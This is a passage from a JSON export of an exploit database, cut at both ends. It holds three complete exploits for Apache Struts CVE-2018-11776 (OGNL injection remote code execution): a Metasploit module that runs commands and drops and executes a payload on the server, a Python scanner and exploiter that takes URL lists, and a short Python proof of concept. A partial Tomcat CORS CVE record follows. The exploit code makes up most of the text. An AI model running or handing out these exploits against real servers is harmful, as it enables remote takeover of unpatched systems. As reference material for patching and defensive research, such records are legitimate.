this fails, try a cmd/* payload, which won't have to write to the disk.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-08T00:00:00", "type": "zdt", "title": "Apache Struts 2 Namespace Redirect OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-08T00:00:00", "id": "1337DAY-ID-31056", "href": "https://0day.today/exploit/description/31056", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n # Eschewing CmdStager for now, since the use of '\\' and ';' are killing me\r\n #include Msf::Exploit::CmdStager # https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability in Apache Struts\r\n version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed\r\n via an endpoint that makes use of a redirect action.\r\n\r\n Native payloads will be converted to executables and dropped in the\r\n server's temp dir. If this fails, try a cmd/* payload, which won't\r\n have to write to the disk.\r\n },\r\n #TODO: Is that second paragraph above still accurate?\r\n 'Author' => [\r\n 'Man Yue Mo', # Discovery\r\n 'hook-s3c', # PoC\r\n 'asoto-r7', # Metasploit module\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-11776'],\r\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],\r\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],\r\n ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' => [\r\n [\r\n 'Automatic detection', {\r\n 'Platform' => %w{ unix windows linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n [\r\n 'Windows', {\r\n 'Platform' => %w{ windows },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n [\r\n 'Linux', {\r\n 'Platform' => %w{ unix linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Aug 22 2018', # Private disclosure = Apr 10 2018\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\r\n OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),\r\n OptString.new('ENABLE_STATIC', [ true, 'Enable \"allowStaticMethodAccess\" before executing OGNL', true ]),\r\n ]\r\n )\r\n register_advanced_options(\r\n [\r\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]),\r\n OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', \"X-#{rand_text_alpha(4)}\"] ),\r\n OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', \"#{rand_text_alpha(8)}\"] ),\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n # METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable\r\n ognl = \"#_memberAccess['allowStaticMethodAccess']\"\r\n\r\n resp = send_struts_request(ognl)\r\n\r\n # If vulnerable, the server should return an HTTP 302 (Redirect)\r\n # and the 'Location' header should contain either 'true' or 'false'\r\n if resp && resp.headers['Location']\r\n output = resp.headers['Location']\r\n vprint_status(\"Redirected to: #{output}\")\r\n if (output.include? '/true/')\r\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\r\n datastore['ENABLE_STATIC'] = false\r\n CheckCode::Vulnerable\r\n elsif (output.include? '/false/')\r\n print_status(\"Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'\")\r\n datastore['ENABLE_STATIC'] = true\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n elsif resp && resp.code==400\r\n # METHOD 2: Generate two random numbers, ask the target to add them together.\r\n # If it does, it's vulnerable.\r\n a = rand(10000)\r\n b = rand(10000)\r\n c = a+b\r\n\r\n ognl = \"#{a}+#{b}\"\r\n\r\n resp = send_struts_request(ognl)\r\n\r\n if resp.headers['Location'].include? c.to_s\r\n vprint_status(\"Redirected to: #{resp.headers['Location']}\")\r\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\r\n datastore['ENABLE_STATIC'] = false\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n end\r\n end\r\n\r\n def exploit\r\n case payload.arch.first\r\n when ARCH_CMD\r\n resp = execute_command(payload.encoded)\r\n else\r\n resp = send_payload()\r\n end\r\n end\r\n\r\n def encode_ognl(ognl)\r\n # Check and fail if the command contains the follow bad characters:\r\n # ';' seems to terminates the OGNL statement\r\n # '/' causes the target to return an HTTP/400 error\r\n # '\\' causes the target to return an HTTP/400 error (sometimes?)\r\n # '\\r' ends the GET request prematurely\r\n # '\\n' ends the GET request prematurely\r\n\r\n # TODO: Make sure the following line is uncommented\r\n bad_chars = %w[; \\\\ \\r \\n] # and maybe '/'\r\n bad_chars.each do |c|\r\n if ognl.include? c\r\n print_error(\"Bad OGNL request: #{ognl}\")\r\n fail_with(Failure::BadConfig, \"OGNL request cannot contain a '#{c}'\")\r\n end\r\n end\r\n\r\n # The following list of characters *must* be encoded or ORNL will asplode\r\n encodable_chars = { \"%\": \"%25\", # Always do this one first. :-)\r\n \" \": \"%20\",\r\n \"\\\"\":\"%22\",\r\n \"#\": \"%23\",\r\n \"'\": \"%27\",\r\n \"<\": \"%3c\",\r\n \">\": \"%3e\",\r\n \"?\": \"%3f\",\r\n \"^\": \"%5e\",\r\n \"`\": \"%60\",\r\n \"{\": \"%7b\",\r\n \"|\": \"%7c\",\r\n \"}\": \"%7d\",\r\n #\"\\/\":\"%2f\", # Don't do this. Just leave it front-slashes in as normal.\r\n #\";\": \"%3b\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n #\"\\\\\":\"%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n #\"\\\\\":\"%5c%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n }\r\n\r\n encodable_chars.each do |k,v|\r\n #ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp)\r\n ognl.gsub!(\"#{k}\",\"#{v}\")\r\n end\r\n return ognl\r\n end\r\n\r\n def send_struts_request(ognl, payload: nil)\r\n=begin #badchar-checking code\r\n pre = ognl\r\n=end\r\n\r\n ognl = \"${#{ognl}}\"\r\n vprint_status(\"Submitted OGNL: #{ognl}\")\r\n ognl = encode_ognl(ognl)\r\n\r\n headers = {'Keep-Alive': 'timeout=5, max=1000'}\r\n\r\n if payload\r\n vprint_status(\"Embedding payload of #{payload.length} bytes\")\r\n headers[datastore['HEADER']] = payload\r\n end\r\n\r\n # TODO: Embed OGNL in an HTTP header to hide it from the Tomcat logs\r\n uri = \"/#{ognl}/#{datastore['ACTION']}\"\r\n\r\n resp = send_request_cgi(\r\n #'encode' => true, # this fails to encode '\\', which is a problem for me\r\n 'uri' => uri,\r\n 'method' => datastore['HTTPMethod'],\r\n 'headers' => headers\r\n )\r\n\r\n if resp && resp.code == 404\r\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 404, please double check TARGETURI and ACTION options\")\r\n end\r\n\r\n=begin #badchar-checking code\r\n print_status(\"Response code: #{resp.code}\")\r\n #print_status(\"Response recv: BODY '#{resp.body}'\") if resp.body\r\n if resp.headers['Location']\r\n print_status(\"Response recv: LOC: #{resp.headers['Location'].split('/')[1]}\")\r\n if resp.headers['Location'].split('/')[1] == pre[1..-2]\r\n print_good(\"GOT 'EM!\")\r\n else\r\n print_error(\" #{pre[1..-2]}\")\r\n end\r\n end\r\n=end\r\n\r\n resp\r\n end\r\n\r\n def profile_target\r\n # Use OGNL to extract properties from the Java environment\r\n\r\n properties = { 'os.name': nil, # e.g. 'Linux'\r\n 'os.arch': nil, # e.g. 'amd64'\r\n 'os.version': nil, # e.g. '4.4.0-112-generic'\r\n 'user.name': nil, # e.g. 'root'\r\n #'user.home': nil, # e.g. '/root' (didn't work in testing)\r\n 'user.language': nil, # e.g. 'en'\r\n #'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing)\r\n }\r\n\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|('#{rand_text_alpha(2)}')|\r\n properties.each do |k,v|\r\n ognl << %Q|+(@[email\u00a0protected]('#{k}'))+':'|\r\n end\r\n ognl = ognl[0...-4]\r\n\r\n r = send_struts_request(ognl)\r\n\r\n if r.code == 400\r\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 400, consider toggling the ENABLE_STATIC option\")\r\n elsif r.headers['Location']\r\n # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'\r\n # Extract the OGNL output from the Location path, and strip the two random chars\r\n s = r.headers['Location'].split('/')[1][2..-1]\r\n\r\n if s.nil?\r\n # Since the target didn't respond with an HTTP/400, we know the OGNL code executed.\r\n # But we didn't get any output, so we can't profile the target. Abort.\r\n return nil\r\n end\r\n\r\n # Confirm that all fields were returned, and non include extra (:) delimiters\r\n # If the OGNL fails, we might get a partial result back, in which case, we'll abort.\r\n if s.count(':') > properties.length\r\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\r\n fail_with(Failure::UnexpectedReply, \"Target responded with unexpected profiling data\")\r\n end\r\n\r\n # Separate the colon-delimited properties and store in the 'properties' hash\r\n s = s.split(':')\r\n i = 0\r\n properties.each do |k,v|\r\n properties[k] = s[i]\r\n i += 1\r\n end\r\n\r\n print_good(\"Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}\" +\r\n \" #{properties[:'os.arch']}, running as #{properties[:'user.name']}\")\r\n return properties\r\n else\r\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\r\n fail_with(Failure::UnexpectedReply, \"Server did not respond properly to profiling attempt.\")\r\n end\r\n end\r\n\r\n def execute_command(cmd_input, opts={})\r\n # Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.\r\n if cmd_input.include? ';'\r\n print_warning(\"WARNING: Command contains bad characters: semicolons (;).\")\r\n end\r\n\r\n begin\r\n properties = profile_target\r\n os = properties[:'os.name'].downcase\r\n rescue\r\n vprint_warning(\"Target profiling was unable to determine operating system\")\r\n os = ''\r\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\r\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\r\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\r\n end\r\n\r\n if (os.include? 'linux') || (os.include? 'nix')\r\n cmd = \"{'sh','-c','#{cmd_input}'}\"\r\n elsif os.include? 'win'\r\n cmd = \"{'cmd.exe','/c','#{cmd_input}'}\"\r\n else\r\n vprint_error(\"Failed to detect target OS. Attempting to execute command directly\")\r\n cmd = cmd_input\r\n end\r\n\r\n # The following OGNL will run arbitrary commands on Windows and Linux\r\n # targets, as well as returning STDOUT and STDERR. In my testing,\r\n # on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.\r\n\r\n vprint_status(\"Executing: #{cmd}\")\r\n\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|\r\n ognl << %q|(#p.redirectErrorStream(true)).|\r\n ognl << %q|(#process=#p.start()).|\r\n ognl << %q|(#r=(@[email\u00a0protected]().getOutputStream())).|\r\n ognl << %q|(@[email\u00a0protected](#process.getInputStream(),#r)).|\r\n ognl << %q|(#r.flush())|\r\n\r\n r = send_struts_request(ognl)\r\n\r\n if r && r.code == 200\r\n print_good(\"Command executed:\\n#{r.body}\")\r\n elsif r\r\n if r.body.length == 0\r\n print_status(\"Payload sent, but no output provided from server.\")\r\n elsif r.body.length > 0\r\n print_error(\"Failed to run command. Response from server: #{r.to_s}\")\r\n end\r\n end\r\n end\r\n\r\n def send_payload\r\n # Probe for the target OS and architecture\r\n begin\r\n properties = profile_target\r\n os = properties[:'os.name'].downcase\r\n rescue\r\n vprint_warning(\"Target profiling was unable to determine operating system\")\r\n os = ''\r\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\r\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\r\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\r\n end\r\n\r\n data_header = datastore['HEADER']\r\n if data_header.empty?\r\n fail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\")\r\n end\r\n\r\n random_filename = datastore['TEMPFILE']\r\n\r\n # d = data stream from HTTP header\r\n # f = path to temp file\r\n # s = stream/handle to temp file\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|(#[email\u00a0protected]@getRequest().getHeader('#{data_header}')).|\r\n ognl << %Q|(#[email\u00a0protected]@createTempFile('#{random_filename}','tmp')).|\r\n ognl << %q|(#f.setExecutable(true)).|\r\n ognl << %q|(#f.deleteOnExit()).|\r\n ognl << %q|(#s=new java.io.FileOutputStream(#f)).|\r\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|\r\n ognl << %q|(#s.write(#d)).|\r\n ognl << %q|(#s.close()).|\r\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\r\n ognl << %q|(#p.start()).|\r\n ognl << %q|(#f.delete()).|\r\n\r\n success_string = rand_text_alpha(4)\r\n ognl << %Q|('#{success_string}')|\r\n\r\n exe = [generate_payload_exe].pack(\"m\").delete(\"\\n\")\r\n r = send_struts_request(ognl, payload: exe)\r\n\r\n if r && r.headers && r.headers['Location'].split('/')[1] == success_string\r\n print_good(\"Payload successfully dropped and executed.\")\r\n elsif r && r.headers['Location']\r\n vprint_error(\"RESPONSE: \" + r.headers['Location'])\r\n fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\")\r\n elsif r && r.code == 400\r\n fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\")\r\n end\r\n end\r\nend\n\n# 0day.today [2021-09-17] #", "sourceHref": "https://0day.today/exploit/31056", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-28T02:33:52", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2018-08-28T00:00:00", "type": "zdt", "title": "Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-28T00:00:00", "id": "1337DAY-ID-30965", "href": "https://0day.today/exploit/description/30965", "sourceData": "#!/usr/bin/env python3\r\n# coding=utf-8\r\n# *****************************************************\r\n# struts-pwn: Apache Struts CVE-2018-11776 Exploit\r\n# Author:\r\n# Mazin Ahmed <Mazin AT MazinAhmed DOT net>\r\n# This code uses a payload from:\r\n# https://github.com/jas502n/St2-057\r\n# *****************************************************\r\n \r\nimport argparse\r\nimport random\r\nimport requests\r\nimport sys\r\ntry:\r\n from urllib import parse as urlparse\r\nexcept ImportError:\r\n import urlparse\r\n \r\n# Disable SSL warnings\r\ntry:\r\n import requests.packages.urllib3\r\n requests.packages.urllib3.disable_warnings()\r\nexcept Exception:\r\n pass\r\n \r\nif len(sys.argv) <= 1:\r\n print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')\r\n print('[*] Struts-PWN - @mazen160')\r\n print('\\n%s -h for help.' % (sys.argv[0]))\r\n exit(0)\r\n \r\n \r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"-u\", \"--url\",\r\n dest=\"url\",\r\n help=\"Check a single URL.\",\r\n action='store')\r\nparser.add_argument(\"-l\", \"--list\",\r\n dest=\"usedlist\",\r\n help=\"Check a list of URLs.\",\r\n action='store')\r\nparser.add_argument(\"-c\", \"--cmd\",\r\n dest=\"cmd\",\r\n help=\"Command to execute. (Default: 'id')\",\r\n action='store',\r\n default='id')\r\nparser.add_argument(\"--exploit\",\r\n dest=\"do_exploit\",\r\n help=\"Exploit.\",\r\n action='store_true')\r\n \r\n \r\nargs = parser.parse_args()\r\nurl = args.url if args.url else None\r\nusedlist = args.usedlist if args.usedlist else None\r\ncmd = args.cmd if args.cmd else None\r\ndo_exploit = args.do_exploit if args.do_exploit else None\r\n \r\nheaders = {\r\n 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',\r\n # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\r\n 'Accept': '*/*'\r\n}\r\ntimeout = 3\r\n \r\n \r\ndef parse_url(url):\r\n \"\"\"\r\n Parses the URL.\r\n \"\"\"\r\n \r\n # url: http://example.com/demo/struts2-showcase/index.action\r\n \r\n url = url.replace('#', '%23')\r\n url = url.replace(' ', '%20')\r\n \r\n if ('://' not in url):\r\n url = str(\"http://\") + str(url)\r\n scheme = urlparse.urlparse(url).scheme\r\n \r\n # Site: http://example.com\r\n site = scheme + '://' + urlparse.urlparse(url).netloc\r\n \r\n # FilePath: /demo/struts2-showcase/index.action\r\n file_path = urlparse.urlparse(url).path\r\n if (file_path == ''):\r\n file_path = '/'\r\n \r\n # Filename: index.action\r\n try:\r\n filename = url.split('/')[-1]\r\n except IndexError:\r\n filename = ''\r\n \r\n # File Dir: /demo/struts2-showcase/\r\n file_dir = file_path.rstrip(filename)\r\n if (file_dir == ''):\r\n file_dir = '/'\r\n \r\n return({\"site\": site,\r\n \"file_dir\": file_dir,\r\n \"filename\": filename})\r\n \r\n \r\ndef build_injection_inputs(url):\r\n \"\"\"\r\n Builds injection inputs for the check.\r\n \"\"\"\r\n \r\n parsed_url = parse_url(url)\r\n injection_inputs = []\r\n url_directories = parsed_url[\"file_dir\"].split(\"/\")\r\n \r\n try:\r\n url_directories.remove(\"\")\r\n except ValueError:\r\n pass\r\n \r\n for i in range(len(url_directories)):\r\n injection_entry = \"/\".join(url_directories[:i])\r\n \r\n if not injection_entry.startswith(\"/\"):\r\n injection_entry = \"/%s\" % (injection_entry)\r\n \r\n if not injection_entry.endswith(\"/\"):\r\n injection_entry = \"%s/\" % (injection_entry)\r\n \r\n injection_entry += \"{{INJECTION_POINT}}/\" # It will be renderred later with the payload.\r\n injection_entry += parsed_url[\"filename\"]\r\n \r\n injection_inputs.append(injection_entry)\r\n \r\n return(injection_inputs)\r\n \r\n \r\ndef check(url):\r\n random_value = int(''.join(random.choice('0123456789') for i in range(2)))\r\n multiplication_value = random_value * random_value\r\n injection_points = build_injection_inputs(url)\r\n parsed_url = parse_url(url)\r\n print(\"[%] Checking for CVE-2018-11776\")\r\n print(\"[*] URL: %s\" % (url))\r\n print(\"[*] Total of Attempts: (%s)\" % (len(injection_points)))\r\n attempts_counter = 0\r\n \r\n for injection_point in injection_points:\r\n attempts_counter += 1\r\n print(\"[%s/%s]\" % (attempts_counter, len(injection_points)))\r\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\r\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", \"${{%s*%s}}\" % (random_value, random_value))\r\n try:\r\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\r\n except Exception as e:\r\n print(\"EXCEPTION::::--> \" + str(e))\r\n continue\r\n if \"Location\" in resp.headers.keys():\r\n if str(multiplication_value) in resp.headers['Location']:\r\n print(\"[*] Status: Vulnerable!\")\r\n return(injection_point)\r\n print(\"[*] Status: Not Affected.\")\r\n return(None)\r\n \r\n \r\ndef exploit(url, cmd):\r\n parsed_url = parse_url(url)\r\n \r\n injection_point = check(url)\r\n if injection_point is None:\r\n print(\"[%] Target is not vulnerable.\")\r\n return(0)\r\n print(\"[%] Exploiting...\")\r\n \r\n payload = \"\"\"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email\u00a0protected]@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email\u00a0protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D\"\"\".format(cmd)\r\n \r\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\r\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", payload)\r\n \r\n try:\r\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\r\n except Exception as e:\r\n print(\"EXCEPTION::::--> \" + str(e))\r\n return(1)\r\n \r\n print(\"[%] Response:\")\r\n print(resp.text)\r\n return(0)\r\n \r\n \r\ndef main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):\r\n if url:\r\n if not do_exploit:\r\n check(url)\r\n else:\r\n exploit(url, cmd)\r\n \r\n if usedlist:\r\n URLs_List = []\r\n try:\r\n f_file = open(str(usedlist), \"r\")\r\n URLs_List = f_file.read().replace(\"\\r\", \"\").split(\"\\n\")\r\n try:\r\n URLs_List.remove(\"\")\r\n except ValueError:\r\n pass\r\n f_file.close()\r\n except Exception as e:\r\n print(\"Error: There was an error in reading list file.\")\r\n print(\"Exception: \" + str(e))\r\n exit(1)\r\n for url in URLs_List:\r\n if not do_exploit:\r\n check(url)\r\n else:\r\n exploit(url, cmd)\r\n \r\n print(\"[%] Done.\")\r\n \r\n \r\nif __name__ == \"__main__\":\r\n try:\r\n main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)\r\n except KeyboardInterrupt:\r\n print(\"\\nKeyboardInterrupt Detected.\")\r\n print(\"Exiting...\")\r\n exit(0)\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30965", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-28T02:33:44", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-08-28T00:00:00", "type": "zdt", "title": "Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-28T00:00:00", "id": "1337DAY-ID-30966", "href": "https://0day.today/exploit/description/30966", "sourceData": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n \r\n# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter\r\n \r\nimport sys\r\nimport urllib\r\nimport urllib2\r\nimport httplib\r\n \r\n \r\ndef exploit(host,cmd):\r\n print \"[Execute]: {}\".format(cmd)\r\n \r\n ognl_payload = \"${\"\r\n ognl_payload += \"(#_memberAccess['allowStaticMethodAccess']=true).\"\r\n ognl_payload += \"(#cmd='{}').\".format(cmd)\r\n ognl_payload += \"(#iswin=(@[email\u00a0protected]('os.name').toLowerCase().contains('win'))).\"\r\n ognl_payload += \"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd})).\"\r\n ognl_payload += \"(#p=new java.lang.ProcessBuilder(#cmds)).\"\r\n ognl_payload += \"(#p.redirectErrorStream(true)).\"\r\n ognl_payload += \"(#process=#p.start()).\"\r\n ognl_payload += \"(#ros=(@[email\u00a0protected]().getOutputStream())).\"\r\n ognl_payload += \"(@[email\u00a0protected](#process.getInputStream(),#ros)).\"\r\n ognl_payload += \"(#ros.flush())\"\r\n ognl_payload += \"}\"\r\n \r\n if not \":\" in host:\r\n host = \"{}:8080\".format(host)\r\n \r\n # encode the payload\r\n ognl_payload_encoded = urllib.quote_plus(ognl_payload)\r\n \r\n # further encoding\r\n url = \"http://{}/{}/help.action\".format(host, ognl_payload_encoded.replace(\"+\",\"%20\").replace(\" \", \"%20\").replace(\"%2F\",\"/\"))\r\n \r\n print \"[Url]: {}\\n\\n\\n\".format(url)\r\n \r\n try:\r\n request = urllib2.Request(url)\r\n response = urllib2.urlopen(request).read()\r\n except httplib.IncompleteRead, e:\r\n response = e.partial\r\n print response\r\n \r\n \r\nif len(sys.argv) < 3:\r\n sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])\r\nelse:\r\n exploit(sys.argv[1],sys.argv[2])\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30966", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-12-01T15:46:59", "description": "The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-16T16:29:00", "type": "cve", "title": "CVE-2018-8014", "cwe": ["CWE-1188"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2023-11-07T03:01:00", "cpe": ["cpe:/a:apache:tomcat:8.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.8", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/a:netapp:storage_automation_store:-", "cpe:/a:netapp:oncommand_workflow_automation:-", "cpe:/a:apache:tomcat:7.0.88", "cpe:/a:apache:tomcat:8.0.52", "cpe:/a:netapp:oncommand_insight:-", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/a:apache:tomcat:8.5.31", "cpe:/a:netapp:oncommand_unified_manager:*", "cpe:/a:netapp:snapcenter_server:-"], "id": "CVE-2018-8014", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8014", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:tomcat:9.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.52:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:storage_automation_store:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:netapp:snapcenter_server:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m1:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.88:*:*:*:*:*:*:*", 